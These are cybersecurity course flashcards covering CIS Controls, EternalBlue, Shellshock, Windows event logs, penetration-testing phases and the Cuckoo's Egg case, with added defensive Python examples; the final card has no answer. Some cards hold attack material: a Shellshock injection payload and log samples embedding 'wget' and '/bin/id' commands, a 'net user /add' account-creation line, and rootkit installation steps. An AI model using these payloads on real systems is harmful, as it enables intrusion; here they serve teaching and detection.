Labs Flashcards

1
Q
According to the Critical Security Controls, which of the Critical Security Controls is considered the most important to reducing risk in an enterprise environment?
A

CIS Control 1: Inventory and Control of Hardware Assets

2
Q
According to the Critical Security Controls, which of the Critical Security Controls is considered the least important to reducing risk in an enterprise environment?
A

CIS Control 20: Penetration Tests and Red Team Exercises

3
Q
Which of the Critical Security Controls specifies conducting security awareness training for a company’s employees?
A

CIS Control 17: Implement a Security Awareness and Training Program

4
Q
Which of the Critical Security Controls is used when a potential security incident occurs within a company?
A

CIS Control 19: Incident Response and Management

5
Q
Which of the Critical Security Controls would application developers be most interested in?
A

CIS Control 18: Application Software Security

6
Q
The NSA ANT Catalog is a list of technological solutions available to NSA team members. What does ANT stand for?
A

Advanced Network Technology

7
Q
What is the name of the NSA “elite hacking force”?
A

Tailored Access Operations (TAO), since renamed Computer Network Operations

8
Q

What is the name given to the NSA hacking group by outside malware companies?
A

The Equation Group

9
Q
Who does Jack Rhysider interview for the podcast? What is the name of the interviewee’s company?
A

Jake Williams; Rendition InfoSec

10
Q
What is the Twitter handle of the person interviewed during the podcast?
A

@MalwareJake

11
Q
Once the Shadow Brokers group stole NSA hacking tools, what did they attempt to do with the stolen tools?
A

Auction them off to the highest bidder

12
Q
Who did the Shadow Brokers refer to as “Dirty Grandpa”?
A

Joe Biden

13
Q
The Shadow Brokers stated that they had supported which President of the United States?
A

Donald Trump

14
Q
What was special about the interviewee that the Shadow Brokers revealed to the world?
A

He was a former member of TAO (the group outside companies call the Equation Group)

15
Q
What is the name of the institute that the interviewee teaches for?
A

SANS Institute

16
Q
What is the name of the exploit created by TAO which can be used to take full control of a Microsoft Windows system over SMB?
A

EternalBlue (the exploit for the SMBv1 flaw patched by MS17-010)

17
Q
How would an organization protect its Windows systems from the EternalBlue exploit?
A

Apply the Windows update: Microsoft released the MS17-010 patch in March 2017, a month before the Shadow Brokers published the exploit. Disabling SMBv1 and blocking TCP port 445 at the perimeter also stop it.

18
Q
The Shadow Brokers are believed to be aligned with which country?
A

Russia

19
Q
Why did the interviewee cancel travel to Singapore after the Shadow Brokers revelation that he was a member of TAO?
A

He may have taken part in TAO operations against China, so he feared he could be arrested or detained while abroad.

20
Q
What is a “Zero Day” exploit?
A

An exploit for a vulnerability that the vendor and defenders do not yet know about, so no patch exists. They have had “zero days” to prepare for the exploit.

21
Q
Chris mentions ‘d0x’ attacks or ‘d0xing’ a target. What is he describing?
A

Gathering (and publishing) personal information on his target

22
Q
What is Chris’ mantra for professional social engineering engagements?
A

“Leave them feeling better having met you.”

23
Q
What type of background noise does Chris use during his pretext phone call? (14:00)
A

A crying “sick” child

24
Q
In the same phone call as the previous card, Chris pretends to be his target’s what?
A

Personal assistant

25
Q
What is the domain name of Chris Hadnagy’s main site which teaches people about the risks associated with social engineering?
A

www.social-engineer.com

26
Q
What is the command line (non-GUI) version of Wireshark?
A

tshark

27
Q
How long is an MD5 hash in bits?
A

128 bits

28
Q
How many bytes are displayed in an MD5 hash?
A

16 bytes (printed as 32 hex characters)

29
Q
How long is a SHA256 file hash in bits?
A

256 bits

30
Q
How many bytes are displayed in a SHA256 hash?
A

32 bytes (printed as 64 hex characters)

31
Q
Why would a member of law enforcement need to calculate the file hash for a file? (Minimum 25 words)
A

To prove the integrity of evidence: the hash recorded when a file is seized or downloaded can be recomputed later to show the file has not changed. When downloading a file it also confirms they received the file they intended, not one altered in transit by a man in the middle.

32
Q
Why would someone else want to calculate a file hash after downloading a file? (Minimum 25 words)
A

For similar reasons: to confirm the downloaded file matches the hash the publisher lists, so it has neither been tampered with nor corrupted during the download.

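The hash sizes from the previous cards and the download check from the last two, worked as an added Python example (not code from the course or the page). The "downloaded" bytes and the tampered copy are constructed here; the algorithm names are the standard hashlib ones.

```python
import hashlib
import hmac

# Constructed sample "download": the bytes an investigator fetched, and a copy
# with a single byte changed, standing in for a file altered in transit.
ORIGINAL = b"evidence-image-v1\n" * 64
TAMPERED = ORIGINAL[:100] + b"X" + ORIGINAL[101:]


def digest_sizes(algorithm: str) -> tuple:
    """Return (bits, raw bytes, hex characters printed) for a hash algorithm."""
    h = hashlib.new(algorithm)
    return (h.digest_size * 8, h.digest_size, len(h.hexdigest()))


def file_hash(data: bytes, algorithm: str = "sha256", chunk: int = 4096) -> str:
    """Hash data in chunks, as you would stream a large file from disk."""
    h = hashlib.new(algorithm)
    for i in range(0, len(data), chunk):
        h.update(data[i:i + chunk])
    return h.hexdigest()


def verify(data: bytes, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Compare the recomputed hash with the one recorded at seizure or
    published by the vendor. compare_digest avoids a timing side channel
    (irrelevant for a local file check, but the right habit)."""
    return hmac.compare_digest(file_hash(data, algorithm), expected_hex.lower())


if __name__ == "__main__":
    recorded = file_hash(ORIGINAL)  # the value written into the evidence log
    print("md5 (bits, bytes, hex chars):", digest_sizes("md5"))
    print("sha256 (bits, bytes, hex chars):", digest_sizes("sha256"))
    print("original verifies:", verify(ORIGINAL, recorded))
    print("tampered verifies:", verify(TAMPERED, recorded))
```

A single flipped byte changes the whole digest, which is why an evidence log records the hash at acquisition and an examiner recomputes it before and after analysis. MD5 is still fine for spotting accidental corruption, but collisions can be manufactured for it, so prefer SHA-256 where someone hostile might substitute a file.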
33
Q
What is the first phase of Penetration Testing? Provide a brief overview of this phase (Minimum 25 words).
A

Pre-engagement: where you agree the plan with the organization. What is the scope of the test? What rules of engagement must you follow? Once you have obtained written authorization from the organization, you can begin phase 2.

34
Q
What is the second phase of Penetration Testing? Provide a brief overview of this phase (Minimum 25 words).
A

Engagement: this is where you actually begin investigating and “attacking” the organization. You search for vulnerabilities in devices, networks, or employees. Once you have sufficient information, you attempt to gain access to the organization by exploiting those vulnerabilities.

35
Q
What is the third phase of Penetration Testing? Provide a brief overview of this phase (Minimum 25 words).
A

Post-engagement: writing a “findings report” from the penetration test. Explain the vulnerabilities you found and suggest steps to fix them. Once those fixes have been implemented, retest to validate that they actually close the vulnerabilities. Finally, hold a meeting with members of the organization to discuss your findings and the actions taken to remedy them.

36
Q
The difference between an attacker and a penetration tester is that a professional penetration tester will always have what?
A

Authorization from the organization being “attacked”

37
Q
Using an automated scan to find security vulnerabilities is referred to as a what? How does this differ from a penetration test? (Minimum 25 words)
A

Vulnerability scan. A vulnerability scan usually comes before a penetration test and is, as the name suggests, an automated scan that detects potential vulnerabilities (including false positives) without exploiting them. In a penetration test an ethical hacker validates those findings by actually attacking and gaining access to the organization’s systems.

38
Q
What is the name of the penetration testing framework established by a number of thought leaders in the penetration testing community?
A

Penetration Testing Execution Standard (PTES)

39
Q
What are the three different types of penetration tests? Describe each in enough detail that someone who is not familiar with the concept could understand. (Minimum 25 words)
A

The first type is Black Box, where no information about the organization is given to the tester beforehand. In the second type, White Box, the organization gives the tester whatever information is requested (such as IP addresses, diagrams, or source code). Finally, Grey Box is a middle ground: some information is provided to the tester, but it is limited.

40
Q
What is a type of attack that is usually not conducted during a penetration test? Why? (Minimum 25 words)
A

Denial of Service (DoS) attacks. These are not usually performed because they affect the availability of the organization’s systems, which can prevent the organization from functioning properly during the test.

41
Q
What is the final deliverable a penetration tester would provide to a client once the penetration test is complete? What are three things that this final deliverable should include? (Minimum 25 words)
A

Penetration Test Report. This should contain the vulnerabilities that were found, how serious each one is, and what actions can be taken to mitigate them. The report should be written so that people without technical knowledge can understand it.

42
Q
Access the dnslytics.com site and run a search for the gvltec.edu domain. What type of information is displayed under “WHOIS Information”?
A

Information about the domain from the registry database: the registrant of the domain, administrative and technical contact information, name servers, and the domain’s registration, updated, and expiration dates.

43
Q
What version of Microsoft Windows Server supports IIS 7.5?
A

Windows Server 2008 R2 (IIS 7.5 also ships with Windows 7)

44
Q
What is the main security concern with companies running IIS 7.5 after January 14th, 2020?
A

Windows Server 2008 R2, and with it IIS 7.5, reached End of Life (end of extended support) on that date, so no further security patches are issued for newly found vulnerabilities.

45
Q
Before you can conduct a web app assessment against any of the web applications associated with the gvltec.edu domain, what do you need to do before conducting any active scans?
A

Gain authorization from the owner of the web site (Greenville Tech in this case)

46
Q

Why would a port show as being filtered?
A

A firewall or other packet filter is dropping the probe (or answering with an ICMP unreachable), so the scanner gets no SYN/ACK and no RST and cannot tell whether the port is open or closed.

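An added Python example (not from the page or the lab) of how a connect scan arrives at the three verdicts: the handshake completing means open, a RST means closed, and silence or an ICMP unreachable means filtered. The demo opens its own listener on loopback so it runs offline; the names are ours.

```python
import socket


def probe_tcp_port(host: str, port: int, timeout: float = 2.0) -> str:
    """Classify a TCP port the way a connect scan (nmap -sT) does.

    open     - the three-way handshake completed, something is listening
    closed   - the host answered with RST: reachable, but nothing on the port
    filtered - no answer before the timeout (probe dropped) or an ICMP
               unreachable came back; a firewall/ACL in the path is the usual cause
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    except OSError:
        # EHOSTUNREACH / ENETUNREACH: an ICMP unreachable, which nmap also
        # reports as filtered because the port state itself is unknown
        return "filtered"
    finally:
        s.close()


def demo_local() -> dict:
    """Probe a listener we open ourselves on loopback, then probe the same
    port after closing it, to see 'open' turn into 'closed'."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the kernel pick one
    listener.listen(1)
    port = listener.getsockname()[1]
    while_listening = probe_tcp_port("127.0.0.1", port)
    listener.close()
    after_close = probe_tcp_port("127.0.0.1", port)
    return {"port": port, "listening": while_listening, "closed": after_close}


if __name__ == "__main__":
    print(demo_local())
```

To see "filtered" for real, point probe_tcp_port at a host behind a firewall that silently drops unsolicited SYNs; the call returns only after the timeout, which is also why filtered ports make scans slow. Do that only against systems you are authorized to scan.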
47
Q
Where did Cliff Stoll work when he was asked to investigate an accounting anomaly?
A

The computer center of Lawrence Berkeley Laboratory (LBL)

48
Q
What is the name of the original account that Cliff Stoll identifies initially as having some initial configuration issues related to the accounting anomaly?
A

Hunter

49
Q
In the network attack scenario discussed with regards to “Locard’s Exchange Principle”, what were three different locations described where digital evidence could be left by a cyber attacker?
A

A sensor connected to a network tap, the firewall, and a database activity monitor

50
Q
Cliff Stoll is contacted by an outside entity that someone at LBL attempted to hack them. What was the name of the outside entity and the name of the system that was being targeted?
A

The National Computer Security Center (NCSC, part of the NSA); the system was Dockmaster

51
Q
As Cliff investigates, he tracks down a user account associated with the attack traffic described in the previous card. What is the name of this account?
A

Sventek

52
Q
What protocol is used to synchronize the system clocks on computer systems?
A

Network Time Protocol (NTP)

53
Q
What was an interesting fact about the legitimate owner of the user account Sventek which makes Cliff Stoll believe there could be a cyber intruder on the network?
A

Sventek was in Cambridge, England at the time.

54
Q

What are the names of the three main Windows event logs?
A

Application, Security, System

55
Q
Under ‘Windows Logs’, click on the ‘System’ event log. Run a search for Event ID 6013 using the ‘Find’ option. What type of information does the event display?
A

Total system uptime (in seconds)

56
Q

Why might a security analyst want to perform a backup of an event log?
A

To preserve a suspicious event or series of events before the log wraps or is cleared, so they can be reviewed later, on another system, or kept as evidence.

57
Q
Search the Security event log for Event ID 4624. What is the purpose of this Event?
A

Logging a successful logon (“An account was successfully logged on”).

58
Q
If you see Event ID 4740 in the Security event log, what type of attack could be happening? If the event was not generated by malicious activity from an attacker but a normal user, what could be happening?
A

4740 is an account lockout. An attacker could be trying to guess (brute-force or password-spray) a user’s password, triggering the lockout threshold.

A legitimate user could simply have forgotten or mistyped their own password.

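Triage logic for the lockout question above, as an added Python example (not from the course or the page). It looks back from each 4740 at the 4625 failed-logon events and separates brute force (many failures, one account), password spraying (one source, many accounts) and an ordinary forgotten password. The event records are constructed; real 4625 events carry IpAddress and real 4740 events carry CallerComputerName, which the example normalises to a single "source" field (an assumption).

```python
from datetime import datetime, timedelta

FAILED_LOGON, LOGON_OK, LOCKOUT = 4625, 4624, 4740


def _ev(event_id, ts, user, source):
    """Build one normalised Security-log record (constructed test data)."""
    return {"EventID": event_id, "time": datetime.fromisoformat(ts),
            "user": user, "source": source}


# Constructed sample events, three scenarios in time order.
SAMPLE_EVENTS = (
    # 20 failures against one account from one IP, then the lockout: brute force
    [_ev(FAILED_LOGON, f"2024-03-01T09:00:{s:02d}", "jsmith", "10.0.0.55") for s in range(0, 40, 2)]
    + [_ev(LOCKOUT, "2024-03-01T09:00:45", "jsmith", "10.0.0.55")]
    # one failure each against 30 accounts from one IP, one unlucky lockout: spray
    + [_ev(FAILED_LOGON, f"2024-03-01T10:00:{s:02d}", f"user{s:02d}", "10.0.0.99") for s in range(0, 30)]
    + [_ev(LOCKOUT, "2024-03-01T10:00:31", "user05", "10.0.0.99")]
    # three typos from the user's own workstation, lockout, later a good logon
    + [_ev(FAILED_LOGON, f"2024-03-01T11:0{m}:00", "mlee", "WS-MLEE") for m in range(0, 3)]
    + [_ev(LOCKOUT, "2024-03-01T11:02:05", "mlee", "WS-MLEE")]
    + [_ev(LOGON_OK, "2024-03-01T11:20:00", "mlee", "WS-MLEE")]
)


def triage_lockouts(events, window=timedelta(minutes=10),
                    brute_force_min=10, spray_min_accounts=10):
    """For every 4740, examine the 4625s in the preceding window and return
    (user, source, verdict) tuples. Thresholds are tunable assumptions."""
    failures = [e for e in events if e["EventID"] == FAILED_LOGON]
    verdicts = []
    for lock in (e for e in events if e["EventID"] == LOCKOUT):
        start = lock["time"] - window
        recent = [f for f in failures if start <= f["time"] <= lock["time"]]
        same_user = [f for f in recent if f["user"] == lock["user"]]
        accounts_from_source = {f["user"] for f in recent if f["source"] == lock["source"]}
        if len(accounts_from_source) >= spray_min_accounts:
            verdict = "password spray"        # one source touching many accounts
        elif len(same_user) >= brute_force_min:
            verdict = "brute force"           # hammering a single account
        else:
            verdict = "likely forgotten password"
        verdicts.append((lock["user"], lock["source"], verdict))
    return verdicts


if __name__ == "__main__":
    for user, source, verdict in triage_lockouts(SAMPLE_EVENTS):
        print(f"{user:8} from {source:12} -> {verdict}")
```

The spray case is the one a plain lockout alert misses: each account sees only one failure, so nothing trips the per-account threshold, and the signal is the count of distinct accounts per source.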
59
Q
If a user is a system administrator for an organization, how many different user accounts (at a minimum) would they have? Why? (25 – 50 words)
A

Admins should have two accounts. The admin account should only be used when a task requires it. The system administrator should also have a regular user account for everyday work such as e-mail and browsing, so a compromise of that account does not hand over admin rights.

60
Q
When investigating suspicious activity today, what is one location a system administrator or security analyst might review for a record of activity on the system?
A

Logs (for example the Windows event logs)

61
Q
Which software had a vulnerability in it that allowed the attacker to overwrite another file on the affected system?
A

GNU Emacs (its movemail utility ran with root privileges and could move a file anywhere on the system)

62
Q
What is the name of the file/command that the attacker was able to replace? What is this file/command used for?
A

atrun, a program that runs “housekeeping” tasks every 5 minutes (as root, which is why replacing it gave the attacker root).

63
Q
When installing an application, you should never give it the same permission level as what account on the system?
A

The Administrator (or root) account

64
Q
As explained by Chris, what is the common thread between all attackers (25 - 50 words)?
A

They want to steal something. Whether that be money directly from you, information that may be valuable to them or someone else, or even your time or reputation.

65
Q

How long did the “Shellshock” vulnerability exist before it was discovered and disclosed to the general public?

A

About 25 years: the bug was introduced in Bash in 1989 and disclosed in September 2014.

66
Q

What software was affected by the “Shellshock” bug?

A

GNU Bash, the Unix/Linux shell

67
Q

If a local user on an affected system exploits the “Shellshock” vulnerability, what type of access do they gain as a result of the local privilege escalation attack?

A

Code execution with the privileges of the process that starts Bash; in the privilege-escalation case described, root/administrator.

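An added Python example (not from the course or the page) for the three Shellshock cards: it runs the classic environment-variable check against the local bash, and applies the same pattern as a detection rule to web server log lines, since the bug was mass-exploited through CGI scripts that export request headers into the environment. The log lines are constructed; the function names are ours.

```python
import os
import re
import subprocess

# CVE-2014-6271: Bash imported shell functions from any environment variable
# whose value starts with "() {", and vulnerable builds kept parsing after the
# closing brace, so the trailing command ran every time Bash started.
PAYLOAD = "() { :;}; echo VULNERABLE"

# The same signature appears in web logs when attackers put the payload in a
# header that a CGI script exports into the environment (User-Agent, Referer,
# Cookie, ...).
PROBE_RE = re.compile(r"\(\)\s*\{")


def bash_is_vulnerable(bash: str = "bash"):
    """True if the local bash executes the trailing command, False if it is
    patched (it then treats the variable as plain data), None if no bash."""
    env = dict(os.environ, SHELLSHOCK_TEST=PAYLOAD)
    try:
        result = subprocess.run([bash, "-c", "echo test"], env=env,
                                capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return None
    return "VULNERABLE" in result.stdout


def looks_like_shellshock_probe(value: str) -> bool:
    """Detection rule for a header value or a whole access-log line."""
    return bool(PROBE_RE.search(value))


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.1.1.7 - - "GET /cgi-bin/status HTTP/1.1" 200 "-" "() { :;}; /bin/bash -c \\"wget hxxp://x/y\\""',
    '10.1.1.8 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.1.1.9 - - "GET /cgi-bin/test.cgi HTTP/1.1" 500 "-" "() {:;};echo;/bin/id"',
]


def flag_probes(lines):
    """Return the client IPs whose request carries the Shellshock pattern."""
    return [line.split()[0] for line in lines if looks_like_shellshock_probe(line)]


if __name__ == "__main__":
    print("local bash vulnerable:", bash_is_vulnerable())
    print("probing sources:", flag_probes(SAMPLE_LOG))
```

On a patched bash the first call prints False and bash itself writes a warning about "ignoring function definition attempt" to stderr; the command after the braces never runs. The log rule is deliberately loose (any "() {"), which is fine for a hunt but will need tuning before it feeds an alert queue.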
68
Q
The attacker, Sventek, “screwed up”. How so? What was the attacker trying to get users to do? (25 - 50 words)
A

He put a password logger (a fake login prompt) in the wrong directory. He was trying to get people to type their passwords into it so that he could read them.

69
Q
A cyber attack must only be as “______________” as it has to be?
A

Sophisticated

70
Q
A user account on a computer system logically represents a what? How can this be exploited by an attacker? (25 - 50 words)
A

A user account represents the person (or service) who holds it. An attacker who steals a user’s credentials can impersonate that user and use every privilege the account has, and the system cannot tell the difference.

71
Q
Where are the three places discussed that clear text passwords can exist?
A

In the user’s head, in transit on the network, and in a limited number of places on the OS (such as the memory of the logon process).

72
Q
Dave Kennedy wrote a tool for conducting social engineering attacks. What is the name of the tool? What does Chris use the tool to do during his demonstration?
A

The Social-Engineer Toolkit (SET). He uses its credential harvester mode to clone a login page and send the fake page to users.

73
Q
What is the name of the tool Chris uses to dump clear text passwords from the operating system’s running memory?
A

mimikatz

74
Q
According to Chris, it is extremely important for cyber security investigators to make sure to always have a what on hand? What would they use it for? (25 - 50 words)
A

A notebook. You will need to write things down frequently during an investigation, and details that seem unimportant now may be exactly what you need later on.

75
Q
What tool does Chris use to crack password hashes?
A

John the Ripper (hashes are not decrypted; the tool guesses candidate passwords, hashes each one, and compares the results)

76
Q
Follow the instructions in the attached document to complete the assignment. Describe each step of the system boot process (25 words minimum each) as outlined in Figure 9-1 in the Chapter.
A
  1. The BIOS ROM chip on the motherboard receives power from the PSU. It then tests the various system functions in a process called the Power On Self Test (POST).
  2. The BIOS reads the Master Boot Record on the storage device, which gives the BIOS the computer’s partition table and the location of the operating system bootloader.
  3. The bootloader takes over control of the PC from the BIOS. The bootloader then begins loading the operating system (or lets the user select one if the PC has a dual-boot configuration).
  4. The operating system, now loaded, starts its services, startup programs and drivers for peripherals. A login screen is usually displayed for the user to select their account.
77
Q

How is the UEFI rootkit installed? (Minimum 25 words)

A

The installer loads RwDrv.sys, a legitimate signed kernel driver, to read low-level PC settings such as PCI configuration and ROMs. Another tool dumps those settings to a text file, and a third reads the SPI flash memory and builds a firmware image from it. Finally, the UEFI malware is inserted into that firmware image and the patched image is flashed back onto the SPI memory.

78
Q

How does the UEFI rootkit work? (Minimum 25 words)

A

It uses a modified version of the LoJack anti-theft agent that contacts the APT’s server instead of Absolute Software (the developers of LoJack), giving the attackers remote code execution on the PC that survives OS reinstalls.

79
Q

How can the UEFI rootkit be removed? (Minimum 25 words)

A

Reinstalling the operating system or wiping and replacing the hard drive will not remove the rootkit, because it lives in the firmware. The only way is to reflash the SPI memory with a known good copy of clean firmware (or replace the motherboard).

80
Q

Which attacker group is being named as the party responsible for the UEFI rootkit?

A

An APT group known as Fancy Bear (also tracked as APT28 / Sednit)

81
Q
As part of his investigation, Cliff Stoll discovered that the attacker attempted to locate systems belonging to the C.I.A. While the attacker did not find addresses for any systems, he did find information related to four different what?
A

Human users

82
Q
Teejay described the C.I.A. network as a “__________” trust network architecture.
A

Zero

83
Q
Cliff detected the attacker accessing the LBL network, not from a TYMNET connection, but from where else?
A

Livermore unclassified computers

84
Q
Shortly after Cliff learns of this new connection source, the attacker breaks into the computer systems of another school. Which school did the attacker break into next and how?
A

MIT, using credentials stolen from Livermore

85
Q
According to Richard Bejtlich, what are the seven characteristics of defensible networks?
A

Monitored, inventoried, controlled, claimed, minimized, assessed, current

86
Q
What type of common security control is used to implement a perimeter-based network? How many zones of trust exist in a standard perimeter-based network?
A

A) A firewall. B) Two: untrusted (outside) and trusted (inside).

87
Q
What are three security issues described with regards to the “shifting nature” of perimeter-based networks as described in the course?
A

Services now live outside the perimeter (cloud services), employees can be located anywhere, and untrusted devices end up in trusted areas

88
Q
What is a common security attack that Google has essentially eliminated within their network by implementing a zero trust network?
A

Phishing

89
Q
Of the three network security models described, which would be used for an ultra-secure network such as the computer network for a nuclear power plant?
A

Air-gapped

90
Q
As a piece of malware, how was Conficker able to infect systems at ultra-secure networks? To help address this issue, what was an example described of how employees can prevent this infection vector?
A

Conficker spread both over the network and via USB devices, so a carried-in USB drive nullified the air gap. Epoxy was put into the USB ports on classified systems, rendering them unusable and so protecting the systems from infected USB drives.

91
Q
Describe why mobile device security is important. (Minimum 50 words)
A

Smartphones and mobile devices are incredibly powerful tools that hold large amounts of personal data. Because they are portable, they are more easily lost or stolen than a desktop. We trust them with payment information, e-mail, authentication codes and personal messages, all of which an attacker who gets hold of the device could steal.

92
Q
What is the most important thing to do in order to secure your mobile device?
A

Set up a screen lock and passcode

93
Q
What was the passcode for Kanye West’s iPhone as of October 11th, 2018? Let’s just hope he’s changed it since then!
A

000000

94
Q
Describe why firmware and app updates on mobile devices are important. (25 - 50 words)
A

Firmware and app updates patch security vulnerabilities in the software. Even slightly out-of-date software with a single known, unpatched vulnerability is a prime target for an attacker, because the exploit is often public by the time the patch ships.

95
Q
Discuss the benefits and disadvantages of enabling tracking for mobile devices. (25 - 50 words)
A

One advantage is that if your device is lost or stolen, it can be easily tracked down or even remotely wiped. One disadvantage is that if an attacker gains access to your account they could see that information and find out where you live, work, and visit.

96
Q
The attacker Cliff Stoll was tracking appeared to also be accessing systems at Stanford and had uploaded a Calculus problem. What were the two pieces of information learned from this upload?
A

A student name (Knute Sears) and a teacher name (Mr. Maher). Cliff had his sister search school records for the two names, but the leads ultimately came up empty.

97
Q
If a corporate network is known to be compromised, what form of communication should employees not use?
A

Email

98
Q
What are three different risks associated with ad networks?
A

Ad network traffic is nearly indistinguishable from a malware delivery network (malvertising), and ads can contain hidden HTML forms that trick browser password managers into auto-filling credentials.

99
Q
What is one way to block the risks associated with ad networks on the systems that you manage?
A

Don’t participate in ad networks: run an ad blocker (or block ad domains at the DNS/proxy level)

100
Q
For Cyber Security professionals practicing OPSEC, how should we consider browsing the Internet to ensure safety and reduce (if not eliminate) the impact of malware?
A

Browse inside a virtual machine on a hypervisor, so anything picked up is contained and the VM can be thrown away.

101
Q
Why would someone want to “safify” (defang) the URL links they embed in documents?
A

So that a malicious URL cannot be clicked or auto-linked by accident: replace the Ts in HTTP with Xs (hxxp://) and enclose the periods in brackets (example[.]com).

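The defang/refang round trip from the previous card as an added Python example (not from the course or page). defang_text handles URLs embedded in a paragraph of report text, which is the usual case; the regex and function names are ours and the sample strings are constructed.

```python
import re

# An http(s) URL: greedy run of non-space/quote characters, but the last
# character may not be trailing punctuation, so "see https://x.io/b." keeps
# the sentence's full stop out of the indicator.
URL_RE = re.compile(r"""https?://[^\s<>"']*[^\s<>"'.,;:)]""", re.IGNORECASE)


def defang(url: str) -> str:
    """Make one URL safe to paste into a report: hxxp(s):// and dots as [.]."""
    out = re.sub(r"^http(s?)://", r"hxxp\1://", url, flags=re.IGNORECASE)
    return out.replace(".", "[.]")


def refang(text: str) -> str:
    """Reverse defang() (also accepting the (.) and {.} variants) so an
    indicator copied from a report can be fed back into a tool."""
    out = re.sub(r"^hxxp(s?)://", r"http\1://", text, flags=re.IGNORECASE)
    for bracketed in ("[.]", "(.)", "{.}"):
        out = out.replace(bracketed, ".")
    return out


def defang_text(text: str) -> str:
    """Defang every http(s) URL inside a block of prose, leaving the rest."""
    return URL_RE.sub(lambda m: defang(m.group(0)), text)


if __name__ == "__main__":
    note = "Payload fetched from http://bad.example.com/a and https://x.io/b."
    print(defang_text(note))
```

Defanging is for humans and mail clients, not a security control: a reader who refangs and pastes the URL into a browser is back where they started, so the indicator should still be handled in an isolated environment.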
102
Q
Describe attacker pivoting. (25 - 50 words)
A

Using a system the attacker has already compromised as a stepping stone to reach and attack other systems it can talk to. Chaining several such hops on the way to the final target also makes the attacker harder to track down, because each victim only sees the previous hop’s address rather than the attacker’s own.

103
Q
Based on the MITRE call data, Cliff updates his profile of the cyber intruder. In what two different ways does he do so?
A

First, he adds that the attacker is likely not a high school student because he is experienced in multiple operating systems (VMS and Unix). Second, he adds that the attacker usually logs in around midday on weekdays, but earlier on the weekend.

104
Q
What are four password requirements that should be followed when creating a strong password for the Master Key? Be sure that these requirements align with those discussed throughout the course.
A

a. A password should… be long (at least 14 characters)
b. A password should… be unique (not reused on any other account)
c. A password should… use both lower and upper case letters, as well as numbers and special characters
d. A password should… not be a dictionary word or a simple variation of one

105
Q
How does Cliff Stoll prevent the attacker from uploading malicious code to LBL systems?
A

He introduces noise into the connection by dangling his keys against the wire, corrupting the attacker’s upload.

106
Q
What does Greg Fennel from the C.I.A. tell Cliff and why?
A

“Just tell me what happened. Don’t embellish, don’t interpret.” He said this because he wanted to make his own conclusion based on the raw, unbiased evidence.

107
Q
Describe the meaning of the anchoring bias in Cyber Security. (25 - 50 words)
A

Anchoring bias is when someone gets too attached (“anchored”) to a theory they believe is correct, such as the first explanation that comes to mind. If that theory turns out to be wrong, it distracts them from the real cause of the problem because later evidence is interpreted to fit the anchor.

108
Q
What are three ways in which you can overcome bias?
A
  1. Gain a better understanding of bias and how you are affected by it
  2. Make your decisions based on evidence rather than your biases
  3. Think about what it would look like if you turned out to be incorrect
109
Q
“It is ___________________ that your Windows Server will be compromised if you don’t patch it and don’t put it behind a firewall.”
A

Very likely

110
Q
What is the name of the bulletin board system Cliff used to find related information to his and other breaches? What is the current home page of the infamous hacker group Cliff learned about via this bulletin board?
A

Usenet. The group was the Chaos Computer Club, whose home page is www.ccc.de.

111
Q
Which aspect of The Diamond Model of Intrusion Analysis would be used to describe aspects of an attacker?
A

Adversary

112
Q
What were the names of the US Keyhole satellites mentioned?
A

Keyhole 9 & 10

113
Q
If you were assigning permissions to the ‘Accounting’ folder, which Share permissions would you give to the Accounting department? Which permissions would you give to other employees?
A

“Change” for the Accounting department group (read, write, modify and delete, but not the ability to alter permissions). No share permissions at all for other departments, so their access is denied at the share before NTFS permissions are even evaluated.

114
Q
If you were assigning permissions to the ‘General’ folder, which Share permissions would you assign?
A

Change for all users/groups

115
Q
When reviewing the Share permissions for the ‘Engineering’ folder, you notice that the ‘Everyone’ group has been assigned ‘Full Control’ permissions. Where could the assigned permission have come from?
A

Either malware or an attacker loosening the share to spread, or a misconfiguration (an administrator granting Everyone Full Control to “make it work” and never tightening it).

116
Q
Is the use of the ‘Everyone’ group on the engineering folder a security issue? Why or why not? (25 - 50 words)
A

Yes, it allows people not in the engineering department to have access to the engineering folder. This is a violation of the principle of least privilege.

117
Q
What specific type of malware could spread with the permissions assigned to ‘Everyone’?
A

Ransomware

118
Q
What would be another command an attacker could use to create a local user account if they were “living off the land”?
A

netplwiz (the built-in User Accounts dialog), or in PowerShell New-LocalUser; the classic one-liner is net user <name> <password> /add

119
Q
(Optional - Extra Credit) What would be an example of a command an attacker could use to conduct a port scan of the compromised host’s network if “living off the land”?
A

A loop over PowerShell’s built-in Test-NetConnection -Port against neighbouring hosts. netstat -a is also useful to an attacker, but it only lists the compromised host’s own listeners and connections (revealing which hosts it already talks to); it does not scan other machines.

120
Q
During this session, Chris discusses how an attacker has broken into one of LBL’s important systems. What is the name of the system and what is it used for? (25 - 50 words)
A

Bevatron. A machine for conducting research into how certain types of radiation can be focused to kill cancer cells without harming healthy ones. This is used as a treatment for cancer patients.

121
Q
Name three things Cliff does to address the attacker on the compromised system. (25 - 50 words)
A

First, he contacts the owner of the system. Second, he tells the owner to change all of the passwords on the compromised system. Finally, he kicks the attacker off the system without the attacker realizing that he is being watched.

122
Q
Provide a general overview of Industrial Control Systems (ICS). Include the names of three ICS-specific systems. (25 - 50 words)
A

ICS is a general term for the systems that monitor and control physical processes in manufacturing, automation, and utilities such as power and water. ICS-specific systems include SCADA (supervisory control and data acquisition), DCS (distributed control systems), and PLCs (programmable logic controllers).

123
Q
Can an attacker cause a major disaster by hacking into an ICS environment such as a power plant or petrochemical facility? Why or why not? (25 - 50 words)
A

Yes. Because ICS controls physical equipment, an attacker could cut water or power to entire areas, and in some cases drive equipment outside its safe limits and destroy a facility. Depending on what fails, this could even result in death.

124
Q
Provide a general overview of honeypots. (25 - 50 words)
A

Systems that are designed to be attacked, sometimes with intentional vulnerabilities. Honeypots are usually used for research and sometimes for tracking worms. They are classified as low or high interaction based on how much of a real system they emulate. Research honeypots are usually placed outside a network’s firewall.

125
Q
How did Cliff come up with the idea to create a honeypot to delay the attacker? (25 - 50 words)
A

